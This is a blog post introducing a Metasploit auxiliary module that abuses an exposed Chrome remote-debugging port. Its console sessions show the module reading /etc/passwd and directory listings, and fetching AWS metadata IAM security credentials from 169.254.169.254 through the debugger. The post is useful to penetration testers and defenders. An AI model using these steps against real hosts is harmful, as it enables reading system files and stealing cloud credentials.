This last week Nick Starke got the chrome debugger metasploit module pushed over the line and merged into master. I figured I’d write up a quick intro to the module and how it might be used should you happen to stumble across a chrome debugger laying around the network.
If you want to startup chrome and test this yourself you can run chrome in a similar fashion.
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --headless
=[ metasploit v5.0.64-dev ] + -- --=[ 1952 exploits - 1092 auxiliary - 335 post ] + -- --=[ 558 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] msf5 > use auxiliary/gather/chrome_debugger
show options tells us what we need to set to make this work. The most important being the RHOST of the chrome debugger we’re going to gather from.
msf5 auxiliary(gather/chrome_debugger) > show options Module options (auxiliary/gather/chrome_debugger): Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH no File to fetch from remote machine. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 9222 yes The target port (TCP) TIMEOUT 10 yes Time to wait for response URL no Url to fetch from remote machine.
We have two paths with this module to abuse with a chrome debugger. First we can read both files and directory listings from the local disk. Second we can query a URL from the network perspective of the chrome debugger system giving us the ability to potentially access or attack local resources that we didn’t have access to before.
Reading a file / directory listing
msf5 auxiliary(gather/chrome_debugger) > set FILEPATH /etc/passwd FILEPATH => /etc/passwd msf5 auxiliary(gather/chrome_debugger) > run [*] Running module against 192.168.12.1 [*] Attempting Connection to ws://192.168.12.1:9222/devtools/page/76FE2B4D88AE3BA2973C801C7A8D1E78 [*] Opened connection [*] Attempting to load url file:///etc/passwd [*] Received Data [*] Sending request for data [*] Received Data [+] Stored file:///etc/passwd at /root/.msf4/loot/20191219130327_default_192.168.12.1_chrome.debugger._265252.txt [*] Auxiliary module execution completed
Abusing proc is useful here too if you aren’t use what directory you are in.
set FILEPATH /proc/self/cwd/
Reading from a remote URL
In this case we’re going to try and access the AWS metadata url, this could be however any internal service.
msf5 auxiliary(gather/chrome_debugger) > set URL http://169.254.169.254/latest/meta-data/iam/security-credentials/ URL => http://169.254.169.254/latest/meta-data/iam/security-credentials/ msf5 auxiliary(gather/chrome_debugger) > run [*] Running module against 192.168.12.1 [*] Attempting Connection to ws://192.168.12.1:9222/devtools/page/2EE2D41C9D77868E7937831A9534FE05 [*] Opened connection [*] Attempting to load url http://169.254.169.254/latest/meta-data/iam/security-credentials/ [*] Received Data [*] Sending request for data [*] Received Data [+] Stored http://169.254.169.254/latest/meta-data/iam/security-credentials/ at /root/.msf4/loot/20191219130931_default_192.168.12.1_chrome.debugger._548422.txt [*] Auxiliary module execution completed